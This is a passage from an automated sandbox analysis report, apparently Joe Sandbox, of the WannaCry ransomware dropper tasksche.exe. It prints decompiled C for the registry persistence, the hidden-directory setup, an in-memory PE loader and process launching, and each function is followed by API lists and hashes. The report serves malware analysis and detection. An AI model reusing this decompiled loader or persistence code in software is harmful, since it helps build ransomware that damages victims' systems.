                    							return _t46;
                    						} else {
                    							goto L10;
                    						}
                    					}
                    					L10:
                    					_v12 = _v12 + 1;
                    				} while (_v12 < 2);
                    				return 0;
                    			}

                    APIs
                    • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                    • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                    • strlen.MSVCRT(?), ref: 004011A7
                    • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                    • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                    • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                    • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                    • String ID: 0@$Software\$WanaCrypt0r
                    • API String ID: 865909632-3421300005
                    • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                    • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                    • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                    • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00401B5F(intOrPtr _a4) {
                    				void _v202;
                    				short _v204;
                    				void _v722;
                    				long _v724;
                    				signed short _v1240;
                    				void _v1242;
                    				long _v1244;
                    				void* _t55;
                    				signed int _t65;
                    				void* _t72;
                    				long _t83;
                    				void* _t94;
                    				void* _t98;
                    
                    				_t83 =  *0x40f874; // 0x0
                    				_v1244 = _t83;
                    				memset( &_v1242, 0, 0x81 << 2);
                    				asm("stosw");
                    				_v724 = _t83;
                    				memset( &_v722, 0, 0x81 << 2);
                    				asm("stosw");
                    				_push(0x31);
                    				_v204 = _t83;
                    				memset( &_v202, 0, 0 << 2);
                    				asm("stosw");
                    				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
                    				GetWindowsDirectoryW( &_v1244, 0x104);
                    				_v1240 = _v1240 & 0x00000000;
                    				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
                    				_t98 = _t94 + 0x30;
                    				if(GetFileAttributesW( &_v724) == 0xffffffff) {
                    					L3:
                    					swprintf( &_v724, L"%s\\Intel",  &_v1244);
                    					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
                    						L2:
                    						_t55 = 1;
                    						return _t55;
                    					} else {
                    						GetTempPathW(0x104,  &_v724);
                    						if(wcsrchr( &_v724, 0x5c) != 0) {
                    							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
                    						}
                    						_t65 = E00401AF6( &_v724,  &_v204, _a4);
                    						asm("sbb eax, eax");
                    						return  ~( ~_t65);
                    					}
                    				}
                    				_t72 = E00401AF6( &_v724,  &_v204, _a4);
                    				_t98 = _t98 + 0xc;
                    				if(_t72 == 0) {
                    					goto L3;
                    				}
                    				goto L2;
                    			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                    • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                    • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                    • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                    • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                    • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                      • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                      • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                    • String ID: %s\Intel$%s\ProgramData
                    • API String ID: 3806094219-198707228
                    • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                    • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                    • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                    • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
                    				signed int _v8;
                    				intOrPtr _v40;
                    				char _v44;
                    				void* _t82;
                    				struct HINSTANCE__* _t83;
                    				intOrPtr* _t84;
                    				intOrPtr _t89;
                    				void* _t91;
                    				void* _t104;
                    				void _t107;
                    				intOrPtr _t116;
                    				intOrPtr _t124;
                    				signed int _t125;
                    				signed char _t126;
                    				intOrPtr _t127;
                    				signed int _t134;
                    				intOrPtr* _t145;
                    				signed int _t146;
                    				intOrPtr* _t151;
                    				intOrPtr _t152;
                    				short* _t153;
                    				signed int _t155;
                    				void* _t156;
                    				intOrPtr _t157;
                    				void* _t158;
                    				void* _t159;
                    				void* _t160;
                    
                    				_v8 = _v8 & 0x00000000;
                    				_t3 =  &_a8; // 0x40213f
                    				if(E00402457( *_t3, 0x40) == 0) {
                    					L37:
                    					return 0;
                    				}
                    				_t153 = _a4;
                    				if( *_t153 == 0x5a4d) {
                    					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
                    						goto L37;
                    					}
                    					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
                    					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
                    						goto L2;
                    					} else {
                    						_t9 = _t151 + 0x38; // 0x68004021
                    						_t126 =  *_t9;
                    						if((_t126 & 0x00000001) != 0) {
                    							goto L2;
                    						}
                    						_t12 = _t151 + 0x14; // 0x4080e415
                    						_t13 = _t151 + 6; // 0x4080e0
                    						_t146 =  *_t13 & 0x0000ffff;
                    						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
                    						if(_t146 <= 0) {
                    							L16:
                    							_t83 = GetModuleHandleA("kernel32.dll");
                    							if(_t83 == 0) {
                    								goto L37;
                    							}
                    							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
                    							_t159 = _t158 + 0xc;
                    							if(_t84 == 0) {
                    								goto L37;
                    							}
                    							 *_t84( &_v44);
                    							_t86 = _v40;
                    							_t23 = _t151 + 0x50; // 0xec8b55c3
                    							_t25 = _t86 - 1; // 0xec8b55c2
                    							_t27 = _t86 - 1; // -1
                    							_t134 =  !_t27;
                    							_t155 =  *_t23 + _t25 & _t134;
                    							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
                    								goto L2;
                    							}
                    							_t31 = _t151 + 0x34; // 0x85680040
                    							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
                    							_t127 = _t89;
                    							_t160 = _t159 + 0x14;
                    							if(_t127 != 0) {
                    								L21:
                    								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
                    								_t156 = _t91;
                    								if(_t156 != 0) {
                    									 *((intOrPtr*)(_t156 + 4)) = _t127;
                    									_t38 = _t151 + 0x16; // 0xc3004080
                    									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
                    									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
                    									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
                    									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
                    									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
                    									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
                    									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
                    									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
                    									_t54 = _t151 + 0x54; // 0x8328ec83
                    									if(E00402457(_a8,  *_t54) == 0) {
                    										L36:
                    										E004029CC(_t156);
                    										goto L37;
                    									}
                    									_t57 = _t151 + 0x54; // 0x8328ec83
                    									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
                    									_t59 = _t151 + 0x54; // 0x8328ec83
                    									_a32 = _t104;
                    									memcpy(_t104, _a4,  *_t59);
                    									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
                    									 *_t156 = _t107;
                    									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
                    									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
                    										goto L36;
                    									}
                    									_t68 = _t151 + 0x34; // 0x85680040
                    									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
                    									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
                    										_t152 = 1;
                    										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
                    									} else {
                    										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
                    										_t152 = 1;
                    									}
                    									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
                    										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
                    										if(_t116 == 0) {
                    											 *((intOrPtr*)(_t156 + 0x34)) = 0;
                    											L41:
                    											return _t156;
                    										}
                    										if( *(_t156 + 0x14) == 0) {
                    											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
                    											goto L41;
                    										}
                    										_push(0);
                    										_push(_t152);
                    										_push(_t127);
                    										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
                    											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
                    											goto L41;
                    										}
                    										SetLastError(0x45a);
                    									}
                    									goto L36;
                    								}
                    								_a16(_t127, _t91, 0x8000, _a32);
                    								L23:
                    								SetLastError(0xe);
                    								L3:
                    								goto L37;
                    							}
                    							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
                    							_t160 = _t160 + 0x14;
                    							if(_t127 == 0) {
                    								goto L23;
                    							}
                    							goto L21;
                    						}
                    						_t145 = _t82 + 0xc;
                    						do {
                    							_t157 =  *((intOrPtr*)(_t145 + 4));
                    							_t124 =  *_t145;
                    							if(_t157 != 0) {
                    								_t125 = _t124 + _t157;
                    							} else {
                    								_t125 = _t124 + _t126;
                    							}
                    							if(_t125 > _v8) {
                    								_v8 = _t125;
                    							}
                    							_t145 = _t145 + 0x28;
                    							_t146 = _t146 - 1;
                    						} while (_t146 != 0);
                    						goto L16;
                    					}
                    				}
                    				L2:
                    				SetLastError(0xc1);
                    				goto L3;
                    			}

                    APIs
                      • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                    • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                    • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                    • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                      • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                    • SetLastError.KERNEL32(0000045A), ref: 00402430
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                    • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                    • API String ID: 1900561814-3657104962
                    • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                    • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                    • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                    • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
                    				void* _t15;
                    				WCHAR* _t17;
                    
                    				CreateDirectoryW(_a4, 0);
                    				if(SetCurrentDirectoryW(_a4) == 0) {
                    					L2:
                    					return 0;
                    				}
                    				_t17 = _a8;
                    				CreateDirectoryW(_t17, 0);
                    				if(SetCurrentDirectoryW(_t17) != 0) {
                    					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
                    					if(_a12 != 0) {
                    						_push(_t17);
                    						swprintf(_a12, L"%s\\%s", _a4);
                    					}
                    					_t15 = 1;
                    					return _t15;
                    				}
                    				goto L2;
                    			}


                    APIs
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                    • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Directory$AttributesCreateCurrentFile$swprintf
                    • String ID: %s\%s
                    • API String ID: 1036847564-4073750446
                    • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                    • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                    • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                    • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
                    				struct _PROCESS_INFORMATION _v20;
                    				struct _STARTUPINFOA _v88;
                    				signed int _t32;
                    				intOrPtr _t37;
                    
                    				_t32 = 0x10;
                    				_v88.cb = 0x44;
                    				memset( &(_v88.lpReserved), 0, _t32 << 2);
                    				_v20.hProcess = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_t37 = 1;
                    				_v88.wShowWindow = 0;
                    				_v88.dwFlags = _t37;
                    				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
                    					return 0;
                    				}
                    				if(_a8 != 0) {
                    					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
                    						TerminateProcess(_v20.hProcess, 0xffffffff);
                    					}
                    					if(_a12 != 0) {
                    						GetExitCodeProcess(_v20.hProcess, _a12);
                    					}
                    				}
                    				CloseHandle(_v20);
                    				CloseHandle(_v20.hThread);
                    				return _t37;
                    			}

                    APIs
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                    • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                    • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                    • CloseHandle.KERNEL32(?), ref: 004010EC
                    • CloseHandle.KERNEL32(?), ref: 004010F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                    • String ID: D
                    • API String ID: 786732093-2746444292
                    • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                    • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                    • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                    • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                    				CHAR* _v8;
                    				intOrPtr* _v24;
                    				intOrPtr _v28;
                    				struct _STARTUPINFOA _v96;
                    				int _v100;
                    				char** _v104;
                    				int _v108;
                    				void _v112;
                    				char** _v116;
                    				intOrPtr* _v120;
                    				intOrPtr _v124;
                    				intOrPtr* _t23;
                    				intOrPtr* _t24;
                    				void* _t27;
                    				void _t29;
                    				intOrPtr _t36;
                    				signed int _t38;
                    				int _t40;
                    				intOrPtr* _t41;
                    				intOrPtr _t42;
                    				intOrPtr _t46;
                    				intOrPtr _t47;
                    				intOrPtr _t49;
                    				intOrPtr* _t55;
                    				intOrPtr _t58;
                    				intOrPtr _t61;
                    
                    				_push(0xffffffff);
                    				_push(0x40d488);
                    				_push(0x4076f4);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t58;
                    				_v28 = _t58 - 0x68;
                    				_v8 = 0;
                    				__set_app_type(2);
                    				 *0x40f94c =  *0x40f94c | 0xffffffff;
                    				 *0x40f950 =  *0x40f950 | 0xffffffff;
                    				_t23 = __p__fmode();
                    				_t46 =  *0x40f948; // 0x0
                    				 *_t23 = _t46;
                    				_t24 = __p__commode();
                    				_t47 =  *0x40f944; // 0x0
                    				 *_t24 = _t47;
                    				 *0x40f954 = _adjust_fdiv;
                    				_t27 = E0040793F( *_adjust_fdiv);
                    				_t61 =  *0x40f870; // 0x1
                    				if(_t61 == 0) {
                    					__setusermatherr(E0040793C);
                    				}
                    				E0040792A(_t27);
                    				_push(0x40e00c);
                    				_push(0x40e008);
                    				L00407924();
                    				_t29 =  *0x40f940; // 0x0
                    				_v112 = _t29;
                    				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
                    				_push(0x40e004);
                    				_push(0x40e000);
                    				L00407924();
                    				_t55 =  *_acmdln;
                    				_v120 = _t55;
                    				if( *_t55 != 0x22) {
                    					while(1) {
                    						__eflags =  *_t55 - 0x20;
                    						if(__eflags <= 0) {
                    							goto L7;
                    						}
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				} else {
                    					do {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    						_t42 =  *_t55;
                    					} while (_t42 != 0 && _t42 != 0x22);
                    					if( *_t55 == 0x22) {
                    						L6:
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				}
                    				L7:
                    				_t36 =  *_t55;
                    				if(_t36 != 0 && _t36 <= 0x20) {
                    					goto L6;
                    				}
                    				_v96.dwFlags = 0;
                    				GetStartupInfoA( &_v96);
                    				_t69 = _v96.dwFlags & 0x00000001;
                    				if((_v96.dwFlags & 0x00000001) == 0) {
                    					_t38 = 0xa;
                    				} else {
                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                    				}
                    				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
                    				_v108 = _t40;
                    				exit(_t40);
                    				_t41 = _v24;
                    				_t49 =  *((intOrPtr*)( *_t41));
                    				_v124 = _t49;
                    				_push(_t41);
                    				_push(_t49);
                    				L0040791E();
                    				return _t41;
                    			}

                    APIs
                    • __set_app_type.MSVCRT(00000002), ref: 004077E7
                    • __p__fmode.MSVCRT ref: 004077FC
                    • __p__commode.MSVCRT ref: 0040780A
                    • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                    • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                    • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                    • String ID:
                    • API String ID: 3626615345-0
                    • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                    • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                    • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                    • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00407831(CHAR* __ebx) {
                    				void* _t19;
                    				void _t21;
                    				intOrPtr _t28;
                    				signed int _t30;
                    				int _t32;
                    				intOrPtr* _t33;
                    				intOrPtr _t34;
                    				CHAR* _t35;
                    				intOrPtr _t38;
                    				intOrPtr* _t41;
                    				void* _t42;
                    
                    				_t35 = __ebx;
                    				__setusermatherr(E0040793C);
                    				E0040792A(_t19);
                    				_push(0x40e00c);
                    				_push(0x40e008);
                    				L00407924();
                    				_t21 =  *0x40f940; // 0x0
                    				 *(_t42 - 0x6c) = _t21;
                    				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
                    				_push(0x40e004);
                    				_push(0x40e000);
                    				L00407924();
                    				_t41 =  *_acmdln;
                    				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                    				if( *_t41 != 0x22) {
                    					while(1) {
                    						__eflags =  *_t41 - 0x20;
                    						if(__eflags <= 0) {
                    							goto L6;
                    						}
                    						_t41 = _t41 + 1;
                    						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                    					}
                    				} else {
                    					do {
                    						_t41 = _t41 + 1;
                    						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                    						_t34 =  *_t41;
                    					} while (_t34 != _t35 && _t34 != 0x22);
                    					if( *_t41 == 0x22) {
                    						L5:
                    						_t41 = _t41 + 1;
                    						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                    					}
                    				}
                    				L6:
                    				_t28 =  *_t41;
                    				if(_t28 != _t35 && _t28 <= 0x20) {
                    					goto L5;
                    				}
                    				 *(_t42 - 0x30) = _t35;
                    				GetStartupInfoA(_t42 - 0x5c);
                    				_t52 =  *(_t42 - 0x30) & 0x00000001;
                    				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
                    					_t30 = 0xa;
                    				} else {
                    					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
                    				}
                    				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
                    				 *(_t42 - 0x68) = _t32;
                    				exit(_t32);
                    				_t33 =  *((intOrPtr*)(_t42 - 0x14));
                    				_t38 =  *((intOrPtr*)( *_t33));
                    				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
                    				_push(_t33);
                    				_push(_t38);
                    				L0040791E();
                    				return _t33;
                    			}

                    APIs
                    • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                      • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                    • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                    • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                    • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                    • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                    • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                    • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                    • String ID:
                    • API String ID: 2141228402-0
                    • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                    • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                    • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                    • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E004027DF(signed int* _a4) {
                    				intOrPtr _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr* _t50;
                    				intOrPtr _t53;
                    				intOrPtr _t55;
                    				void* _t58;
                    				void _t60;
